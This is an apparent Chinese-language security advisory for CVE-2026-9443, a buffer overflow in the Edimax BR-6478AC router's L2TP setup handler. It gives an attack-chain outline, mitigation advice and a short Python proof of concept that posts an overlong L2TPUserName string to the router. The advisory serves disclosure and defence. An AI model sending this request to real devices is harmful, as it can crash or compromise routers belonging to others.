CVE-2026-9443 CVSS 8.8 高危

CVE-2026-9443 Edimax BR-6478AC 缓冲区溢出漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9443

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Edimax BR-6478AC

漏洞概述

Edimax BR-6478AC v1.23 版本中存在严重的安全漏洞，位于 `/goform/formL2TPSetup` 处理函数。攻击者可利用该漏洞，通过精心构造的 POST 请求操纵 `L2TPUserName` 参数，引发缓冲区溢出。此攻击可远程发起，无需用户交互，可能导致设备被完全控制或拒绝服务。

技术细节

该漏洞源于 Edimax BR-6478AC 固件在处理 L2TP 设置请求时，未对 `L2TPUserName` 输入参数进行严格的长度验证和边界检查。当攻击者向 `/goform/formL2TPSetup` 接口发送恶意构造的 POST 请求时，过长的用户名字符串将导致堆栈缓冲区溢出。由于组件在处理请求时缺乏安全过滤，攻击数据可覆盖返回地址或关键内存区域。鉴于该服务可能以特定权限运行，成功利用此漏洞可导致远程代码执行（RCE）、系统崩溃或敏感信息泄露，且攻击过程无需用户交互，仅需网络访问权限。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别出目标为 Edimax BR-6478AC 路由器，并确认其固件版本为 1.23。

STEP 2

2. 漏洞利用

攻击者向目标路由器的 /goform/formL2TPSetup 接口发送特制的 POST 请求，其中 L2TPUserName 参数包含超长字符串。

STEP 3

3. 触发溢出

由于程序未检查输入长度，长字符串导致缓冲区溢出，覆盖关键内存区域（如返回地址）。

STEP 4

4. 执行代码

控制流被劫持，设备执行攻击者注入的恶意代码，导致设备被控制或崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://<TARGET_IP>/goform/formL2TPSetup"

# Malicious payload to trigger buffer overflow
# Adjust length based on specific offset analysis
payload = {
    "L2TPUserName": "A" * 1000,  # Example overflow length
    "L2TPPassword": "test"
}

try:
    response = requests.post(url, data=payload, timeout=5)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
except Exception as e:
    print(f"Exploit request sent: {e}")

影响范围

Edimax BR-6478AC 1.23

防御指南

临时缓解措施

建议立即将管理后台访问权限限制在受信任的内部网络中，并检查是否存在厂商发布的补丁。如果无法立即升级，应关闭设备的 Web 管理接口或 L2TP 服务以降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表